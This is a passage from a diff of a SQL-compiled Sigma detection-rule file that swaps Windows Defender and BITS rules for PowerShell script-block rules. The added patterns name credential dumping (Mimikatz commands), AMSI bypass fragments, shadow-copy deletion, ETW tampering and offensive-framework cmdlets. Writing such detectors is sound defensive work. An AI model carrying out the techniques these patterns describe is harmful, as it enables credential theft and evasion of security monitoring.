'\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" ], - "filename": "win_defender_tamper_protection_trigger.yml" + "filename": "posh_ps_susp_win32_shadowcopy.yml" }, { - "title": "Windows Defender Threat Detection Disabled", - "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", - "status": "stable", - "description": "Detects disabling Windows Defender threat protection", - "author": "Ján Trenčanský, frack113", + "title": "Powershell Install a DLL in System Directory", + "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", + "status": "experimental", + "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1556.002" ], "falsepositives": [ - "Administrator actions (should be investigated)", - "Seen being triggered occasionally during Windows 8 Defender Updates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "win_defender_disabled.yml" + "filename": "posh_ps_copy_item_system_directory.yml" }, { - "title": "Windows Defender Threat Detected", - "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", - "status": "stable", - "description": "Detects all actions taken by Windows Defender malware detection engines", - "author": "Ján Trenčanský", + "title": "Disable of ETW Trace - Powershell", + "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "status": "experimental", + "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "win_defender_threat.yml" + "filename": "posh_ps_etw_trace_evasion.yml" }, { - "title": "Important Scheduled Task Deleted", - "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", + "title": "Potential Invoke-Mimikatz PowerShell Script", + "id": "189e3b02-82b2-4b90-9662-411eb64486d4", "status": "experimental", - "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113", + "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "author": "Tim Rauch", "tags": [ - "attack.impact", - "attack.t1489" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Mimikatz can be useful for testing the security of networks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" ], - "filename": "win_taskscheduler_susp_schtasks_delete.yml" + "filename": "posh_ps_potential_invoke_mimikatz.yml" }, { - "title": "Suspicious Download with BITS from Direct IP", - "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a direct IP. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Live Memory Dump Using Powershell", + "id": "cd185561-4760-45d6-a63e-a51325112cae", + "status": "test", + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Diagnostics" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" ], - "filename": "win_bits_client_direct_ip_access.yml" + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" }, { - "title": "Suspicious Download with BITS from Suspicious TLD", - "id": "d635249d-86b5-4dad-a8c7-d7272b788586", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", + "title": "Code Executed Via Office Add-in XLL File", + "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", + "status": "test", + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", "attack.persistence", - "attack.t1197" + "attack.t1137.006" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_domain.yml" + "filename": "posh_ps_office_comobject_registerxll.yml" }, { - "title": "Download with BITS to Suspicious Folder", - "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", - "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell ShellCode", + "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "status": "test", + "description": "Detects Base64 encoded Shellcode", + "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.privilege_escalation", + "attack.t1055", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%\\%public\\%%' ESCAPE '\\' OR LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" ], - "filename": "win_bits_client_susp_local_folder.yml" + "filename": "posh_ps_shellcode_b64.yml" }, { - "title": "Unsigned Binary Loaded From Suspicious Location", - "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", - "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "NTFS Alternate Data Stream", + "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "status": "test", + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "author": "Sami Ruohonen", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" ], - "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" + "filename": "posh_ps_ntfs_ads_access.yml" }, { - "title": "Microsoft Defender Blocked from Loading Unsigned DLL", - "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", + "title": "AMSI Bypass Pattern Assembly GetType", + "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1562.001", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" ], - "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" }, { - "title": "HybridConnectionManager Service Running", - "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "tags": [ - "attack.persistence", - "attack.t1554" + "title": "Suspicious PowerShell Mailbox Export to Share - PS", + "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.exfiltration" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "win_hybridconnectionmgr_svc_running.yml" + "filename": "posh_ps_mailboxexport_share.yml" }, { - "title": "Standard User In High Privileged Group", - "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", + "title": "Invoke-Obfuscation Via Stdin - Powershell", + "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "status": "experimental", - "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" ], - "filename": "win_lsa_server_normal_user_admin.yml" + "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" }, { - "title": "Loading Diagcab Package From Remote Path", - "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", + "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", "status": "experimental", - "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate package hosted on a known and authorized remote location" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Direct Syscall of NtOpenProcess", - "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", - "status": "experimental", - "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", - "author": "Christian Burkard (Nextron Systems), Tim Shelton", + "title": "Malicious PowerShell Commandlets - ScriptBlock", + "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", "tags": [ "attack.execution", - "attack.t1106" + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADR%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRExcel%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRHTML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRJSON%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRXML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADIDNS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText 